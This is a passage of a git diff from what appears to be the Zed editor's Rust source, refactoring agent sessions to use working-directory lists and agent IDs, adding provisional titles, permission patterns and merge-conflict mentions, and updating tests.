entity.update(cx, |_term, cx| { + cx.notify(); + }); + } else { + self.pending_terminal_exit.insert(terminal_id, status); + } + } + } + } } fn markdown_for_raw_output( @@ -2615,7 +2985,7 @@ mod tests { use futures::{channel::mpsc, future::LocalBoxFuture, select}; use gpui::{App, AsyncApp, TestAppContext, WeakEntity}; use indoc::indoc; - use project::{FakeFs, Fs}; + use project::{AgentId, FakeFs, Fs}; use rand::{distr, prelude::*}; use serde_json::json; use settings::SettingsStore; @@ -2628,7 +2998,7 @@ mod tests { sync::atomic::{AtomicBool, AtomicUsize, Ordering::SeqCst}, time::Duration, }; - use util::path; + use util::{path, path_list::PathList}; fn init_test(cx: &mut TestAppContext) { env_logger::try_init().ok(); @@ -2646,7 +3016,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project, + PathList::new(&[std::path::Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2710,7 +3086,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project, + PathList::new(&[std::path::Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2798,7 +3180,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project.clone(), Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project.clone(), + PathList::new(&[Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2855,9 +3243,27 @@ mod tests { ); }); - // Wait for the printf command to execute and produce output - // Use real time since parking is enabled - cx.executor().timer(Duration::from_millis(500)).await; + // Poll until the printf command produces output, rather than using a + // fixed sleep which is flaky on loaded machines. + let deadline = std::time::Instant::now() + Duration::from_secs(10); + loop { + let has_output = thread.read_with(cx, |thread, cx| { + let term = thread + .terminals + .get(&terminal_id) + .expect("terminal not found"); + let content = term.read(cx).inner().read(cx).get_content(); + content.contains("output_before_kill") + }); + if has_output { + break; + } + assert!( + std::time::Instant::now() < deadline, + "Timed out waiting for printf output to appear in terminal", + ); + cx.executor().timer(Duration::from_millis(50)).await; + } // Get the acp_thread Terminal and kill it let wait_for_exit = thread.update(cx, |thread, cx| { @@ -2909,7 +3315,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3003,7 +3411,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3084,7 +3494,9 @@ mod tests { .unwrap(); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3125,7 +3537,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3200,7 +3614,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3274,7 +3690,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3322,7 +3740,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3413,7 +3833,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3472,7 +3894,9 @@ mod tests { } })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3645,7 +4069,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3721,7 +4147,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3794,7 +4222,9 @@ mod tests { } })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3871,6 +4301,7 @@ mod tests { struct FakeAgentConnection { auth_methods: Vec, sessions: Arc>>>, + set_title_calls: Rc>>, on_user_message: Option< Rc< dyn Fn( @@ -3889,6 +4320,7 @@ mod tests { auth_methods: Vec::new(), on_user_message: None, sessions: Arc::default(), + set_title_calls: Default::default(), } } @@ -3913,6 +4345,10 @@ mod tests { } impl AgentConnection for FakeAgentConnection { + fn agent_id(&self) -> AgentId { + AgentId::new("fake") + } + fn telemetry_id(&self) -> SharedString { "fake".into() } @@ -3924,7 +4360,7 @@ mod tests { fn new_session( self: Rc, project: Entity, - _cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { let session_id = acp::SessionId::new( @@ -3938,7 +4374,8 @@ mod tests { let thread = cx.new(|cx| { AcpThread::new( None, - "Test", + None, + Some(work_dirs), self.clone(), project, action_log, @@ -3957,7 +4394,7 @@ mod tests { } fn authenticate(&self, method: acp::AuthMethodId, _cx: &mut App) -> Task> { - if self.auth_methods().iter().any(|m| m.id == method) { + if self.auth_methods().iter().any(|m| m.id() == &method) { Task::ready(Ok(())) } else { Task::ready(Err(anyhow!("Invalid Auth Method"))) @@ -3993,11 +4430,32 @@ mod tests { })) } + fn set_title( + &self, + _session_id: &acp::SessionId, + _cx: &App, + ) -> Option> { + Some(Rc::new(FakeAgentSessionSetTitle { + calls: self.set_title_calls.clone(), + })) + } + fn into_any(self: Rc) -> Rc { self } } + struct FakeAgentSessionSetTitle { + calls: Rc>>, + } + + impl AgentSessionSetTitle for FakeAgentSessionSetTitle { + fn run(&self, title: SharedString, _cx: &mut App) -> Task> { + self.calls.borrow_mut().push(title); + Task::ready(Ok(())) + } + } + struct FakeAgentSessionEditor { _session_id: acp::SessionId, } @@ -4016,7 +4474,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4082,7 +4542,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4395,7 +4857,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4469,7 +4933,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4552,7 +5018,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4589,4 +5057,138 @@ mod tests { ); }); } + + #[gpui::test] + async fn test_provisional_title_replaced_by_real_title(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let connection = Rc::new(FakeAgentConnection::new()); + let set_title_calls = connection.set_title_calls.clone(); + + let thread = cx + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) + .await + .unwrap(); + + // Initial title is the default. + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), None); + }); + + // Setting a provisional title updates the display title. + thread.update(cx, |thread, cx| { + thread.set_provisional_title("Hello, can you help…".into(), cx); + }); + thread.read_with(cx, |thread, _| { + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Hello, can you help…") + ); + }); + + // The provisional title should NOT have propagated to the connection. + assert_eq!( + set_title_calls.borrow().len(), + 0, + "provisional title should not propagate to the connection" + ); + + // When the real title arrives via set_title, it replaces the + // provisional title and propagates to the connection. + let task = thread.update(cx, |thread, cx| { + thread.set_title("Helping with Rust question".into(), cx) + }); + task.await.expect("set_title should succeed"); + thread.read_with(cx, |thread, _| { + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Helping with Rust question") + ); + }); + assert_eq!( + set_title_calls.borrow().as_slice(), + &[SharedString::from("Helping with Rust question")], + "real title should propagate to the connection" + ); + } + + #[gpui::test] + async fn test_session_info_update_replaces_provisional_title_and_emits_event( + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let connection = Rc::new(FakeAgentConnection::new()); + + let thread = cx + .update(|cx| { + connection.clone().new_session( + project, + PathList::new(&[Path::new(path!("/test"))]), + cx, + ) + }) + .await + .unwrap(); + + let title_updated_events = Rc::new(RefCell::new(0usize)); + let title_updated_events_for_subscription = title_updated_events.clone(); + thread.update(cx, |_thread, cx| { + cx.subscribe( + &thread, + move |_thread, _event_thread, event: &AcpThreadEvent, _cx| { + if matches!(event, AcpThreadEvent::TitleUpdated) { + *title_updated_events_for_subscription.borrow_mut() += 1; + } + }, + ) + .detach(); + }); + + thread.update(cx, |thread, cx| { + thread.set_provisional_title("Hello, can you help…".into(), cx); + }); + assert_eq!( + *title_updated_events.borrow(), + 1, + "setting a provisional title should emit TitleUpdated" + ); + + let result = thread.update(cx, |thread, cx| { + thread.handle_session_update( + acp::SessionUpdate::SessionInfoUpdate( + acp::SessionInfoUpdate::new().title("Helping with Rust question"), + ), + cx, + ) + }); + result.expect("session info update should succeed"); + + thread.read_with(cx, |thread, _| { + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Helping with Rust question") + ); + assert!( + !thread.has_provisional_title(), + "session info title update should clear provisional title" + ); + }); + + assert_eq!( + *title_updated_events.borrow(), + 2, + "session info title update should emit TitleUpdated" + ); + assert!( + connection.set_title_calls.borrow().is_empty(), + "session info title update should not propagate back to the connection" + ); + } } diff --git a/crates/acp_thread/src/connection.rs b/crates/acp_thread/src/connection.rs index 0becded53762be7c96789b0d31191fd9cbc02bfe..58a8aa33830f12ffb713490c87c47133cc2ad96f 100644 --- a/crates/acp_thread/src/connection.rs +++ b/crates/acp_thread/src/connection.rs @@ -2,20 +2,15 @@ use crate::AcpThread; use agent_client_protocol::{self as acp}; use anyhow::Result; use chrono::{DateTime, Utc}; -use collections::IndexMap; +use collections::{HashMap, IndexMap}; use gpui::{Entity, SharedString, Task}; use language_model::LanguageModelProviderId; -use project::Project; +use project::{AgentId, Project}; use serde::{Deserialize, Serialize}; -use std::{ - any::Any, - error::Error, - fmt, - path::{Path, PathBuf}, - rc::Rc, - sync::Arc, -}; +use std::{any::Any, error::Error, fmt, path::PathBuf, rc::Rc, sync::Arc}; +use task::{HideStrategy, SpawnInTerminal, TaskId}; use ui::{App, IconName}; +use util::path_list::PathList; use uuid::Uuid; #[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, Hash)] @@ -27,13 +22,37 @@ impl UserMessageId { } } +pub fn build_terminal_auth_task( + id: String, + label: String, + command: String, + args: Vec, + env: HashMap, +) -> SpawnInTerminal { + SpawnInTerminal { + id: TaskId(id), + full_label: label.clone(), + label: label.clone(), + command: Some(command), + args, + command_label: label, + env, + use_new_terminal: true, + allow_concurrent_runs: true, + hide: HideStrategy::Always, + ..Default::default() + } +} + pub trait AgentConnection { + fn agent_id(&self) -> AgentId; + fn telemetry_id(&self) -> SharedString; fn new_session( self: Rc, project: Entity, - cwd: &Path, + _work_dirs: PathList, cx: &mut App, ) -> Task>>; @@ -45,9 +64,10 @@ pub trait AgentConnection { /// Load an existing session by ID. fn load_session( self: Rc, - _session: AgentSessionInfo, + _session_id: acp::SessionId, _project: Entity, - _cwd: &Path, + _work_dirs: PathList, + _title: Option, _cx: &mut App, ) -> Task>> { Task::ready(Err(anyhow::Error::msg("Loading sessions is not supported"))) @@ -59,7 +79,11 @@ pub trait AgentConnection { } /// Close an existing session. Allows the agent to free the session from memory. - fn close_session(&self, _session_id: &acp::SessionId, _cx: &mut App) -> Task> { + fn close_session( + self: Rc, + _session_id: &acp::SessionId, + _cx: &mut App, + ) -> Task> { Task::ready(Err(anyhow::Error::msg("Closing sessions is not supported"))) } @@ -71,9 +95,10 @@ pub trait AgentConnection { /// Resume an existing session by ID without replaying previous messages. fn resume_session( self: Rc, - _session: AgentSessionInfo, + _session_id: acp::SessionId, _project: Entity, - _cwd: &Path, + _work_dirs: PathList, + _title: Option, _cx: &mut App, ) -> Task>> { Task::ready(Err(anyhow::Error::msg( @@ -88,6 +113,14 @@ pub trait AgentConnection { fn auth_methods(&self) -> &[acp::AuthMethod]; + fn terminal_auth_task( + &self, + _method: &acp::AuthMethodId, + _cx: &App, + ) -> Option { + None + } + fn authenticate(&self, method: acp::AuthMethodId, cx: &mut App) -> Task>; fn prompt( @@ -237,9 +270,10 @@ impl AgentSessionListResponse { #[derive(Debug, Clone, PartialEq)] pub struct AgentSessionInfo { pub session_id: acp::SessionId, - pub cwd: Option, + pub work_dirs: Option, pub title: Option, pub updated_at: Option>, + pub created_at: Option>, pub meta: Option, } @@ -247,9 +281,10 @@ impl AgentSessionInfo { pub fn new(session_id: impl Into) -> Self { Self { session_id: session_id.into(), - cwd: None, + work_dirs: None, title: None, updated_at: None, + created_at: None, meta: None, } } @@ -435,18 +470,53 @@ impl AgentModelList { pub struct PermissionOptionChoice { pub allow: acp::PermissionOption, pub deny: acp::PermissionOption, + pub sub_patterns: Vec, } impl PermissionOptionChoice { pub fn label(&self) -> SharedString { self.allow.name.clone().into() } + + /// Build a `SelectedPermissionOutcome` for this choice. + /// + /// If the choice carries `sub_patterns`, they are attached as + /// `SelectedPermissionParams::Terminal`. + pub fn build_outcome(&self, is_allow: bool) -> crate::SelectedPermissionOutcome { + let option = if is_allow { &self.allow } else { &self.deny }; + + let params = if !self.sub_patterns.is_empty() { + Some(crate::SelectedPermissionParams::Terminal { + patterns: self.sub_patterns.clone(), + }) + } else { + None + }; + + crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind).params(params) + } +} + +/// Pairs a tool's permission pattern with its display name +/// +/// For example, a pattern of `^cargo\\s+build(\\s|$)` would display as `cargo +/// build`. It's handy to keep these together rather than trying to derive +/// one from the other. +#[derive(Debug, Clone, PartialEq)] +pub struct PermissionPattern { + pub pattern: String, + pub display_name: String, } #[derive(Debug, Clone)] pub enum PermissionOptions { Flat(Vec), Dropdown(Vec), + DropdownWithPatterns { + choices: Vec, + patterns: Vec, + tool_name: String, + }, } impl PermissionOptions { @@ -454,6 +524,7 @@ impl PermissionOptions { match self { PermissionOptions::Flat(options) => options.is_empty(), PermissionOptions::Dropdown(options) => options.is_empty(), + PermissionOptions::DropdownWithPatterns { choices, .. } => choices.is_empty(), } } @@ -472,6 +543,17 @@ impl PermissionOptions { None } }), + PermissionOptions::DropdownWithPatterns { choices, .. } => { + choices.iter().find_map(|choice| { + if choice.allow.kind == kind { + Some(&choice.allow) + } else if choice.deny.kind == kind { + Some(&choice.deny) + } else { + None + } + }) + } } } @@ -484,6 +566,57 @@ impl PermissionOptions { self.first_option_of_kind(acp::PermissionOptionKind::RejectOnce) .map(|option| option.option_id.clone()) } + + /// Build a `SelectedPermissionOutcome` for the `DropdownWithPatterns` + /// variant when the user has checked specific pattern indices. + /// + /// Returns `Some` with the always-allow/deny outcome when at least one + /// pattern is checked. Returns `None` when zero patterns are checked, + /// signaling that the caller should degrade to allow-once / deny-once. + /// + /// Panics (debug) or returns `None` (release) if called on a non- + /// `DropdownWithPatterns` variant. + pub fn build_outcome_for_checked_patterns( + &self, + checked_indices: &[usize], + is_allow: bool, + ) -> Option { + let PermissionOptions::DropdownWithPatterns { + choices, patterns, .. + } = self + else { + debug_assert!( + false, + "build_outcome_for_checked_patterns called on non-DropdownWithPatterns" + ); + return None; + }; + + let checked_patterns: Vec = patterns + .iter() + .enumerate() + .filter(|(index, _)| checked_indices.contains(index)) + .map(|(_, cp)| cp.pattern.clone()) + .collect(); + + if checked_patterns.is_empty() { + return None; + } + + // Use the first choice (the "Always" choice) as the base for the outcome. + let always_choice = choices.first()?; + let option = if is_allow { + &always_choice.allow + } else { + &always_choice.deny + }; + + let outcome = crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind) + .params(Some(crate::SelectedPermissionParams::Terminal { + patterns: checked_patterns, + })); + Some(outcome) + } } #[cfg(feature = "test-support")] @@ -496,6 +629,7 @@ mod test_support { //! - `create_test_png_base64` for generating test images use std::sync::Arc; + use std::sync::atomic::{AtomicUsize, Ordering}; use action_log::ActionLog; use collections::HashMap; @@ -531,11 +665,14 @@ mod test_support { ) } - #[derive(Clone, Default)] + #[derive(Clone)] pub struct StubAgentConnection { sessions: Arc>>, permission_requests: HashMap, next_prompt_updates: Arc>>, + supports_load_session: bool, + agent_id: AgentId, + telemetry_id: SharedString, } struct Session { @@ -543,12 +680,21 @@ mod test_support { response_tx: Option>, } + impl Default for StubAgentConnection { + fn default() -> Self { + Self::new() + } + } + impl StubAgentConnection { pub fn new() -> Self { Self { next_prompt_updates: Default::default(), permission_requests: HashMap::default(), sessions: Arc::default(), + supports_load_session: false, + agent_id: AgentId::new("stub"), + telemetry_id: "stub".into(), } } @@ -564,6 +710,58 @@ mod test_support { self } + pub fn with_supports_load_session(mut self, supports_load_session: bool) -> Self { + self.supports_load_session = supports_load_session; + self + } + + pub fn with_agent_id(mut self, agent_id: AgentId) -> Self { + self.agent_id = agent_id; + self + } + + pub fn with_telemetry_id(mut self, telemetry_id: SharedString) -> Self { + self.telemetry_id = telemetry_id; + self + } + + fn create_session( + self: Rc, + session_id: acp::SessionId, + project: Entity, + work_dirs: PathList, + title: Option, + cx: &mut gpui::App, + ) -> Entity { + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let thread = cx.new(|cx| { + AcpThread::new( + None, + title, + Some(work_dirs), + self.clone(), + project, + action_log, + session_id.clone(), + watch::Receiver::constant( + acp::PromptCapabilities::new() + .image(true) + .audio(true) + .embedded_context(true), + ), + cx, + ) + }); + self.sessions.lock().insert( + session_id, + Session { + thread: thread.downgrade(), + response_tx: None, + }, + ); + thread + } + pub fn send_update( &self, session_id: acp::SessionId, @@ -600,8 +798,12 @@ mod test_support { } impl AgentConnection for StubAgentConnection { + fn agent_id(&self) -> AgentId { + self.agent_id.clone() + } + fn telemetry_id(&self) -> SharedString { - "stub".into() + self.telemetry_id.clone() } fn auth_methods(&self) -> &[acp::AuthMethod] { @@ -618,35 +820,33 @@ mod test_support { fn new_session( self: Rc, project: Entity, - _cwd: &Path, + work_dirs: PathList, cx: &mut gpui::App, ) -> Task>> { - let session_id = acp::SessionId::new(self.sessions.lock().len().to_string()); - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let thread = cx.new(|cx| { - AcpThread::new( - None, - "Test", - self.clone(), - project, - action_log, - session_id.clone(), - watch::Receiver::constant( - acp::PromptCapabilities::new() - .image(true) - .audio(true) - .embedded_context(true), - ), - cx, - ) - }); - self.sessions.lock().insert( - session_id, - Session { - thread: thread.downgrade(), - response_tx: None, - }, - ); + static NEXT_SESSION_ID: AtomicUsize = AtomicUsize::new(0); + let session_id = + acp::SessionId::new(NEXT_SESSION_ID.fetch_add(1, Ordering::SeqCst).to_string()); + let thread = self.create_session(session_id, project, work_dirs, None, cx); + Task::ready(Ok(thread)) + } + + fn supports_load_session(&self) -> bool { + self.supports_load_session + } + + fn load_session( + self: Rc, + session_id: acp::SessionId, + project: Entity, + work_dirs: PathList, + title: Option, + cx: &mut App, + ) -> Task>> { + if !self.supports_load_session { + return Task::ready(Err(anyhow::Error::msg("Loading sessions is not supported"))); + } + + let thread = self.create_session(session_id, project, work_dirs, title, cx); Task::ready(Ok(thread)) } diff --git a/crates/acp_thread/src/diff.rs b/crates/acp_thread/src/diff.rs index 8886b458d623237b74f715d3c1d0def33fbefa7d..a6d3b86db7c980bb5e4e5a8cacee95abeaabc3f1 100644 --- a/crates/acp_thread/src/diff.rs +++ b/crates/acp_thread/src/diff.rs @@ -149,6 +149,16 @@ impl Diff { } } + pub fn file_path(&self, cx: &App) -> Option { + match self { + Self::Pending(PendingDiff { new_buffer, .. }) => new_buffer + .read(cx) + .file() + .map(|file| file.full_path(cx).to_string_lossy().into_owned()), + Self::Finalized(FinalizedDiff { path, .. }) => Some(path.clone()), + } + } + pub fn multibuffer(&self) -> &Entity { match self { Self::Pending(PendingDiff { multibuffer, .. }) => multibuffer, @@ -181,7 +191,7 @@ impl Diff { } pub fn has_revealed_range(&self, cx: &App) -> bool { - self.multibuffer().read(cx).paths().next().is_some() + !self.multibuffer().read(cx).is_empty() } pub fn needs_update(&self, old_text: &str, new_text: &str, cx: &App) -> bool { diff --git a/crates/acp_thread/src/mention.rs b/crates/acp_thread/src/mention.rs index 5769d13860f2466f95fe7dd67c1f908812e40c2d..28038ecbc04c59d1c5107872210056f11b413141 100644 --- a/crates/acp_thread/src/mention.rs +++ b/crates/acp_thread/src/mention.rs @@ -19,7 +19,9 @@ pub enum MentionUri { File { abs_path: PathBuf, }, - PastedImage, + PastedImage { + name: String, + }, Directory { abs_path: PathBuf, }, @@ -32,10 +34,6 @@ pub enum MentionUri { id: acp::SessionId, name: String, }, - TextThread { - path: PathBuf, - name: String, - }, Rule { id: PromptId, name: String, @@ -60,6 +58,9 @@ pub enum MentionUri { GitDiff { base_ref: String, }, + MergeConflict { + file_path: String, + }, } impl MentionUri { @@ -134,12 +135,6 @@ impl MentionUri { id: acp::SessionId::new(thread_id), name, }) - } else if let Some(path) = path.strip_prefix("/agent/text-thread/") { - let name = single_query_param(&url, "name")?.context("Missing thread name")?; - Ok(Self::TextThread { - path: path.into(), - name, - }) } else if let Some(rule_id) = path.strip_prefix("/agent/rule/") { let name = single_query_param(&url, "name")?.context("Missing rule name")?; let rule_id = UserPromptId(rule_id.parse()?); @@ -162,7 +157,9 @@ impl MentionUri { include_warnings, }) } else if path.starts_with("/agent/pasted-image") { - Ok(Self::PastedImage) + let name = + single_query_param(&url, "name")?.unwrap_or_else(|| "Image".to_string()); + Ok(Self::PastedImage { name }) } else if path.starts_with("/agent/untitled-buffer") { let fragment = url .fragment() @@ -215,6 +212,9 @@ impl MentionUri { let base_ref = single_query_param(&url, "base")?.unwrap_or_else(|| "main".to_string()); Ok(Self::GitDiff { base_ref }) + } else if path.starts_with("/agent/merge-conflict") { + let file_path = single_query_param(&url, "path")?.unwrap_or_default(); + Ok(Self::MergeConflict { file_path }) } else { bail!("invalid zed url: {:?}", input); } @@ -231,10 +231,9 @@ impl MentionUri { .unwrap_or_default() .to_string_lossy() .into_owned(), - MentionUri::PastedImage => "Image".to_string(), + MentionUri::PastedImage { name } => name.clone(), MentionUri::Symbol { name, .. } => name.clone(), MentionUri::Thread { name, .. } => name.clone(), - MentionUri::TextThread { name, .. } => name.clone(), MentionUri::Rule { name, .. } => name.clone(), MentionUri::Diagnostics { .. } => "Diagnostics".to_string(), MentionUri::TerminalSelection { line_count } => { @@ -245,6 +244,13 @@ impl MentionUri { } } MentionUri::GitDiff { base_ref } => format!("Branch Diff ({})", base_ref), + MentionUri::MergeConflict { file_path } => { + let name = Path::new(file_path) + .file_name() + .unwrap_or_default() + .to_string_lossy(); + format!("Merge Conflict ({name})") + } MentionUri::Selection { abs_path: path, line_range, @@ -254,23 +260,58 @@ impl MentionUri { } } + pub fn tooltip_text(&self) -> Option { + match self { + MentionUri::File { abs_path } | MentionUri::Directory { abs_path } => { + Some(abs_path.to_string_lossy().into_owned().into()) + } + MentionUri::Symbol { + abs_path, + line_range, + .. + } => Some( + format!( + "{}:{}-{}", + abs_path.display(), + line_range.start(), + line_range.end() + ) + .into(), + ), + MentionUri::Selection { + abs_path: Some(path), + line_range, + .. + } => Some( + format!( + "{}:{}-{}", + path.display(), + line_range.start(), + line_range.end() + ) + .into(), + ), + _ => None, + } + } + pub fn icon_path(&self, cx: &mut App) -> SharedString { match self { MentionUri::File { abs_path } => { FileIcons::get_icon(abs_path, cx).unwrap_or_else(|| IconName::File.path().into()) } - MentionUri::PastedImage => IconName::Image.path().into(), + MentionUri::PastedImage { .. } => IconName::Image.path().into(), MentionUri::Directory { abs_path } => FileIcons::get_folder_icon(false, abs_path, cx) .unwrap_or_else(|| IconName::Folder.path().into()), MentionUri::Symbol { .. } => IconName::Code.path().into(), MentionUri::Thread { .. } => IconName::Thread.path().into(), - MentionUri::TextThread { .. } => IconName::Thread.path().into(), MentionUri::Rule { .. } => IconName::Reader.path().into(), MentionUri::Diagnostics { .. } => IconName::Warning.path().into(), MentionUri::TerminalSelection { .. } => IconName::Terminal.path().into(), MentionUri::Selection { .. } => IconName::Reader.path().into(), MentionUri::Fetch { .. } => IconName::ToolWeb.path().into(), MentionUri::GitDiff { .. } => IconName::GitBranch.path().into(), + MentionUri::MergeConflict { .. } => IconName::GitMergeConflict.path().into(), } } @@ -285,10 +326,18 @@ impl MentionUri { url.set_path(&abs_path.to_string_lossy()); url } - MentionUri::PastedImage => Url::parse("zed:///agent/pasted-image").unwrap(), + MentionUri::PastedImage { name } => { + let mut url = Url::parse("zed:///agent/pasted-image").unwrap(); + url.query_pairs_mut().append_pair("name", name); + url + } MentionUri::Directory { abs_path } => { let mut url = Url::parse("file:///").unwrap(); - url.set_path(&abs_path.to_string_lossy()); + let mut path = abs_path.to_string_lossy().into_owned(); + if !path.ends_with('/') && !path.ends_with('\\') { + path.push('/'); + } + url.set_path(&path); url } MentionUri::Symbol { @@ -332,15 +381,6 @@ impl MentionUri { url.query_pairs_mut().append_pair("name", name); url } - MentionUri::TextThread { path, name } => { - let mut url = Url::parse("zed:///").unwrap(); - url.set_path(&format!( - "/agent/text-thread/{}", - path.to_string_lossy().trim_start_matches('/') - )); - url.query_pairs_mut().append_pair("name", name); - url - } MentionUri::Rule { name, id } => { let mut url = Url::parse("zed:///").unwrap(); url.set_path(&format!("/agent/rule/{id}")); @@ -374,6 +414,11 @@ impl MentionUri { url.query_pairs_mut().append_pair("base", base_ref); url } + MentionUri::MergeConflict { file_path } => { + let mut url = Url::parse("zed:///agent/merge-conflict").unwrap(); + url.query_pairs_mut().append_pair("path", file_path); + url + } } } } @@ -457,6 +502,21 @@ mod tests { assert_eq!(uri.to_uri().to_string(), expected); } + #[test] + fn test_directory_uri_round_trip_without_trailing_slash() { + let uri = MentionUri::Directory { + abs_path: PathBuf::from(path!("/path/to/dir")), + }; + let serialized = uri.to_uri().to_string(); + assert!(serialized.ends_with('/'), "directory URI must end with /"); + let parsed = MentionUri::parse(&serialized, PathStyle::local()).unwrap(); + assert!( + matches!(parsed, MentionUri::Directory { .. }), + "expected Directory variant, got {:?}", + parsed + ); + } + #[test] fn test_parse_symbol_uri() { let symbol_uri = uri!("file:///path/to/file.rs?symbol=MySymbol#L10:20"); diff --git a/crates/acp_tools/Cargo.toml b/crates/acp_tools/Cargo.toml index 0720c4b6685ecf7fa20d8cacd2b61baa765c961c..8f14b1f93b32c6df521ea13ebf3f0f73e7ed755c 100644 --- a/crates/acp_tools/Cargo.toml +++ b/crates/acp_tools/Cargo.toml @@ -23,7 +23,7 @@ project.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/acp_tools/src/acp_tools.rs b/crates/acp_tools/src/acp_tools.rs index b5b0e078ae0e41f5c3527265009fac803757ff1a..ae8a39c8df4f73ae8be6b748694dbde5d2a0c102 100644 --- a/crates/acp_tools/src/acp_tools.rs +++ b/crates/acp_tools/src/acp_tools.rs @@ -13,10 +13,10 @@ use gpui::{ StyleRefinement, Subscription, Task, TextStyleRefinement, Window, actions, list, prelude::*, }; use language::LanguageRegistry; -use markdown::{CodeBlockRenderer, Markdown, MarkdownElement, MarkdownStyle}; -use project::Project; +use markdown::{CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownStyle}; +use project::{AgentId, Project}; use settings::Settings; -use 